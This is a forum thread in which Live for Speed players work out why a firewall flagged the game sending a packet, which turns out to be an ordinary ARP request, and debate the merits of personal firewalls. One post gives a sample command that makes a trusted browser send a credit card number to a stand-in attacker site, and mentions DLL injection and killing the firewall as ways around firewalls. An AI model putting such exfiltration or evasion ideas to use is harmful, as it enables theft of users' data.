Hello,

I've noticed several times when installing a new patch that my software firewall kicks in randomly because the LFS executable has changed and it queries me whether to allow the application access to the network or not. However, the time and place of LFS's attempt to send data is a little mysterious.
I was just driving some offline laps when I received the following information from my firewall:

The executable has changed since the last time you used: D:\Spiele\LFS\LFS.exe
File Version :
File Description : D:\Spiele\LFS\LFS.exe
File Path : D:\Spiele\LFS\LFS.exe
Process ID : 0xC2C (Heximal) 3116 (Decimal)
Connection origin : local initiated
Protocol : Raw Ethernet
Local Address : 0.0.0.0
Local Port : 0
Remote Name :
Remote Address : 0.0.0.0
Remote Port : 0
Ethernet packet details:
Ethernet II (Packet Length: 56)
Destination: ff-ff-ff-ff-ff-ff
Source: 00-50-70-92-14-2b
Type: ARP (0x0806)
Address Resolution Protocol (ARP)
Hardware type: Ethernet (0x0001)
Protocol type: IP (0x0800)
Hardware size: 6
Protocol size: 4
Opcode: Request
Sender hardware address: 00-50-70-92-14-2b
Sender IP address: 192.168.4.100
Target hardware address: 00-00-00-00-00-00
Target IP address: 192.168.4.254
Binary dump of the packet:
0000: FF FF FF FF FF FF 00 50 : 70 92 14 2B 08 06 00 01 | .......Pp..+....
0010: 08 00 06 04 00 01 00 50 : 70 92 14 2B C0 A8 04 64 | .......Pp..+...d
0020: 00 00 00 00 00 00 C0 A8 : 04 FE C8 19 FC 74 50 18 | .............tP.
0030: 42 4C 1F 7A 00 00 2A 05 : | BL.z..*.

What exactly is LFS trying to achieve? The target IP address is the local address of my router... so is that some kind of network broadcast? Why does it happen randomly during offline play? :/

Maybe Scawen could shed some light on this?

biggie

Hi biggie.

LFS should not make any attempts to send packets, unless you ask it to, as described here :

http://www.lfsforum.net/showthread.php?p=117972#post117972

My software firewall has never told me that LFS is trying to send packets unexpectedly. The only packets it should usually send in offline mode, are either InSim, OutSim or OutGauge packets, which could only be started by a command line /insim=xxxxx or some lines in the cfg.txt (make sure OutGauge Mode and OutSim Mode are set to 0).

Other than that, I have not a clue - maybe some overactive antivirus software, or a virus?

All of my LFS also send such packets. When I make a rule to block these connections, it waits quite a lot (expecting network connection).

Direction: outgoing
Local Point: 0.0.0.0, port 31000
Adapter: N/A
Remote Point: 127.0.0.1, port 28888
Protocol: UDP

checking config...

Well, I've found a line in cfg.txt:

OutSim Mode 0

I have an antivirus, but checked to assure an MD5 of running LFS.exe and a fresh unpacked:

@Scawen: thanks for your reply. I've read through your posting in the other thread and I really appreciate your approach on this matter. This is all part of what makes LFS so great.

However, I couldn't imagine how a virus would affect LFS. Actually my firewall has an application hijacking detection, so if for example a virus would attempt to "remote-control" another application to mask itself, the firewall would detect it. I don't know how secure this feature is, but I highly doubt it might be a virus
Does the binary dump of the packet tell you anything?

I'm gonna do another virus scan and check for processes not showing up in the task manager. You never know :/

Quote from detail :

Well, I've found a line in cfg.txt:
OutSim Mode 0

OutSim and OutGauge are both 0 for me too.

Biggie, Do you have the d3d8.dll in your LFS dir? I've renamed it and the packets dissapeared. Checked this twice. d3d8.dll (GhostCar mod) was the cause for me.

Found it because noticed that GhostCar has the same port 28888 to which mysterious packets were sent.

Of course he does - he uses the ghostcar

Quote from detail :

Biggie, Do you have the d3d8.dll in your LFS dir? I've renamed it and the packets dissapeared. Checked this twice. d3d8.dll (GhostCar mod) was the cause for me.

Found it because noticed that GhostCar has the same port 28888 to which mysterious packets were sent.

Nope, I don't use the GhostMod :/ there's not a single dll in my LFS folder.

Quote from tristancliffe :

Of course he does - he uses the ghostcar

Neither I use it, but I've tried once and left the dll there, Mr. Sense of Humour.

How to check these packets ? (any manual for noobs like me ?! )

Quote from detail :

All of my LFS also send such packets. When I make a rule to block these connections, it waits quite a lot (expecting network connection).

Direction: outgoing
Local Point: 0.0.0.0, port 31000
Adapter: N/A
Remote Point: 127.0.0.1, port 28888
Protocol: UDP

checking config...

127.0.0.1 is your local computer. no need to worry, it doesn't send the data out of your computer. probably some kind of inter-application connumication like insim or the other stuff that scawen mentioned.

I know that. For me it just makes some inconvenience with firewall windows.

Quote from biggie :

Connection origin : local initiated
Protocol : Raw Ethernet
Local Address : 0.0.0.0
Destination: ff-ff-ff-ff-ff-ff
Source: 00-50-70-92-14-2b
Type: ARP (0x0806)
Address Resolution Protocol (ARP)
Hardware type: Ethernet (0x0001)
Protocol type: IP (0x0800)
Opcode: Request
Sender hardware address: 00-50-70-92-14-2b
Sender IP address: 192.168.4.100
Target hardware address: 00-00-00-00-00-00
Target IP address: 192.168.4.254

What exactly is LFS trying to achieve?

OK, now for some (ether) networking 101.

Skip to 'In plain english' if you don't want to be confused by networking details

On a ethernet network devices need the hardware address (MAC address) of each other to be able to communicate. If you are running a TCP/IP protocol over a ethernet network, your computer needs to know which IP address (e.g. 192.168.1.1) corresponds to which MAC/hardware address (e.g. 00-50-56-C0-00-01).

To get this information your computer will broadcast a 'ARP request' containing the IP address of a device of which it likes to know the MAC/hardware address. Usualy this 'ARP request' is not sent by the application itself, it is part of the address resolution (see ARP) handled by the OS. The response to the above request will be sent by the device listening to the target IP address.

In your case the application wanted to know the MAC/hardware address of the device listening to the IP address 192.168.4.254. This is absolutely harmless and standard procedure.

In plain english

Your computer shouted 'Who is listening to 192.168.4.254 and where does he live'. This is absolutely normal and happens all the time when your computer is trying to talk to a computer in your local network via TCP/IP. Those ARP packets are never sent to the internet because nobody in the outer world would care.

What i wonder is, what crappy software 'firewall' does give you that kind of useless information?

On a personal side note: I so hate 'personal firewalls'! If you are on DSL/cable get a cheap router and live in peace.

Quote from aDRENOcHROME :

On a personal side note: I so hate 'personal firewalls'! If you are on DSL/cable get a cheap router and live in peace.

But... a router can only stop things listening as servers (because you have to specifically tell the router to forward the specified port to the specified local ip address). It doesn't stop anything you run on your computer, from accessing the internet. I'm pleased that my software firewall stops so many programs accessing the internet! So many programs you install, immediately try to send some info somewhere, and I really do not want these programs "phoning home" without my consent. Who knows what info they are going to send?

And it has also stopped some very mysterious things from accessing the internet, somehow a program that was intialised simply by browing the web. The router would not have made any attempt to stop these unauthorised internet accesses.

Quote from Scawen :

somehow a program that was intialised simply by browing the web.

do you use internet explorer?

Quote from Scawen :

But... a router can only stop things listening as servers (because you have to specifically tell the router to forward the specified port to the specified local ip address). It doesn't stop anything you run on your computer, from accessing the internet. I'm pleased that my software firewall stops so many programs accessing the internet! So many programs you install, immediately try to send some info somewhere, and I really do not want these programs "phoning home" without my consent. Who knows what info they are going to send?

I'm fully aware of this and i ran software firewalls for years, so i know what you are talking about. But I think in most cases either the risk is low or the firewall will not protect me sufficiently. Let me get into this ...

IMHO There are two types of applications i would like to keep from accessing network resources:
1) bad mannered standard applications (eg. phone home software)
2) malicious software (eg. trojans, viruses, ...)

In case of (1) 'phoney software', it boils down to trust and keeping sensitive data safe. On top of this i have heaps of realy boring data on my HD and i doubt any software will find something interesting to phone home about. Again this is not about evil software, just chatty phone home applications. So the risk is low (on my computer).

Another thing i noticed is that in times of the 'intarweb' a lot of applications are net-bound by nature, so you either cannot block net access without making it useless or you open up your firewall. There's just no way to tell legitimate from nasty traffic. Catch22

Case (2) 'the evildoers' is something completely different. In my opinion you cannot block malicious traffic because you usually have at least one trusted application in your 'firewall'. Lets say you have IE in your trusted list of apps. What prevents evil app (tm) from calling 'IEXPLORE.EXE http://evilsite,com/eat.php?mycreditcard=123456'. Or even worse injecting code into the trusted app (DLL inject) and piggyback sensitive data reusing trusted network connections. As far as i know software firewalls still do the fingerprinting 'on disk' and not 'in memory' so it will go unnoticed. Considering recent virus descriptions it also seems to be possible to simply kill the firewall process and happily send data unnoticed.

To sum it all up ... I (and it might only work for me) rely on trusted software and keeping sensitive data safe. The small gain in protection for me is not worth the trouble i had with recent sw firewalls.

Edit: One thing i forgot. Considering the constant nagging of sw firewalls that this or that application wants net access, endusers tend to allow a lot more apps access than needed. They just want to get rid of the message box. Another problem is that a user has to grant permission based on the path and name of the application. Let's say i'm an evil programmer and i wrote a software called 'IEXPLORE.EXE' located in 'c:\programms\'. Which user would think 'ahh this is strange usually IE lives in ...'? I bet 90% would grant the application access thinking 'stupid firewall i told you zillion times that IE is trusted'. OK, i'll stop ranting ... in the end i would always trust LFS.exe

Well, from your own post:

Quote from biggie :

The executable has changed since the last time you used: D:\Spiele\LFS\LFS.exe

Sounds very much like a virus to me. Can't see any other reason for LFS.exe changing. Unless it's simply the firewall reacting to a patch or something...

Quote from Scawen :

But... a router can only stop things listening as servers (because you have to specifically tell the router to forward the specified port to the specified local ip address). It doesn't stop anything you run on your computer, from accessing the internet. I'm pleased that my software firewall stops so many programs accessing the internet! So many programs you install, immediately try to send some info somewhere, and I really do not want these programs "phoning home" without my consent. Who knows what info they are going to send?

And it has also stopped some very mysterious things from accessing the internet, somehow a program that was intialised simply by browing the web. The router would not have made any attempt to stop these unauthorised internet accesses.

Amen to that
Been using SPF, and it's quite interesting what apps try to access the internet. Possibly the most interesting one is IE when searching local (!) files... of course, it gets blocked and continues to work as usual as if nothing happened

Quote from wien :

Well, from your own post:Sounds very much like a virus to me. Can't see any other reason for LFS.exe changing. Unless it's simply the firewall reacting to a patch or something...

Quote from biggie from initial posting :

I've noticed several times when installing a new patch that my software firewall kicks in...

@aDRENOcHROME: (love it when you have to copy&paste people's usernames to address them :P) Thanks for your insights into networking. Anyway, for some reason I completely overlooked the line that said "ARP"... of course this isn't at all dangerous. I was aware that the target IP was my router so actually no harm could have been done.

Furthermore I agree with Scawen. I'm actually happy to have a personal firewall to allow me to control my outbound network traffic at least a little bit. To me, the firewall already does a fine job by not allowing most of the "standard applications" to access directly. I like to be in control, or at least have the illusion of being in control
About trojans and viruses... well, I don't really don't know their advanced techniques. But as I said, my software firewall has an application hijacking detection. So when another programm tries to use the internet explorer to do something very very mean, it will alert me about this.
It also features a "DLL authentication" which keeps applications from running DLLs in the context of other trusted applications.
Again, I cannot say how secure this is in the end but it's the best free personal firewall available. I'm glad to have it. And I haven't had any viruses or trojans in years...
It's always good to keep an open eye, not install software blindly, keep peering the task manager from time to time (and from time to time use tools that also show hidden processes...) and of course keep your system up-to-date patch wise. It worked for me in the last few years. No problems whatsoever.

Quote from GC :

How to check these packets ? (any manual for noobs like me ?! )

http://www.blitzbox-download.com/spf.exe



There's a full packet logging mechanism and you can define a maximum filesize for the log. As you can imagine, this log would grow big quite fast
It might be more useful to disable (or only temporarily activate) this because the firewall will automatically show you the latest packet from access attempts of unknown applications anyway. I'm sure that packet logging might drain some resources on your system if enabled permanently.

Quote from biggie :

@aDRENOcHROME: (love it when you have to copy&paste people's usernames to address them :P) Thanks for your insights into networking. Anyway, for some reason I completely overlooked the line that said "ARP"... of course this isn't at all dangerous. I was aware that the target IP was my router so actually no harm could have been done.

i guess you never heard about "arp poisoning" (arp IS dangerous), lfs has no reason at all to send arp packets even for normal online activity, so to me (from the info you gave) sounds like a virus trying to reprogram routes into your lan to be "the man in the middle" ...but this is also unlikely to me, are you sure you cannot give more infos?
what firewall do you have? do you listen audio cd on pc (remember sony rootkit)?

Quote from Honey :

i guess you never heard about "arp poisoning" (arp IS dangerous), lfs has no reason at all to send arp packets even for normal online activity, so to me (from the info you gave) sounds like a virus trying to reprogram routes into your lan to be "the man in the middle" ...but this is also unlikely to me, are you sure you cannot give more infos?
what firewall do you have? do you listen audio cd on pc (remember sony rootkit)?

Actually, I'm a networking n00b but your advice is much appreciated. I've heard of ARP before and while I know what it does, I wasn't really aware that it might be abused in this fashion.
I'm using the Sygate Personal Firewall 5.6 and I haven't listened to Sony Audio CDs on my PC. I know about their dirty business with the rootkit which is why I won't buy any of that crap.

I've just noticed that this ARP requesting also happens with other applications, so I think we can rule out that this is an LFS problem. Whether it's a glitch in a firewall or really some mean old trojan horse, I'm not sure. At least there's no strange processes running or suspicious connections open on my PC. And as I said I'm usually very careful with what I install... I'll post my findings if there's anything interesting I discover

maybe you can try rootkit revealer from sysinternals.com it's free and may help to find if a rootkit is installed (i forget that starforce too is a malevolous rootkit), unfortunately interpreting its report is not an easy task but on the site there should be some info or some faqs.

i never tried sygate, i suggest to do some google search with "sygate arp" or similar (it is obvious but many times i forget it also ), so you may find if it's a firewall false alarm or bug

hope it helps

EDIT:
on that site you find other useful tools like "process explorer" and "autoruns" (and many other) that may help you see a detailed insight of current processes and dependencies and what is actually instantiated at every windows boot

Sygate is the best software firewall there is.

sometimes you might be suprised there is no single entry in process list or autorun but the vir,trojan or whatsoever is in your system.

I was cleaning in last 2 month several computers and antivirus didnt find that bad trojans.There was no entry in autoran or process list.

Just by a guess what the user told me and when the weird things start to happend I had to search file by file:Eyecrazy: and found something.It was confusing job as the files were also simply undeleteable.

Just some user browse on doubtfully webpages.Today is very hard to guess for normal user when searching something which page you can trust and which not:-(.

Quote from DEVIL 007 :

sometimes you might be suprised there is no single entry in process list or autorun but the vir,trojan or whatsoever is in your system.

just to be clear "process explorer" and "autoruns" from sysinternals shows the very hidden things and not the classical keys in registry or task manager list...you can never understand how deep those apps are until you try.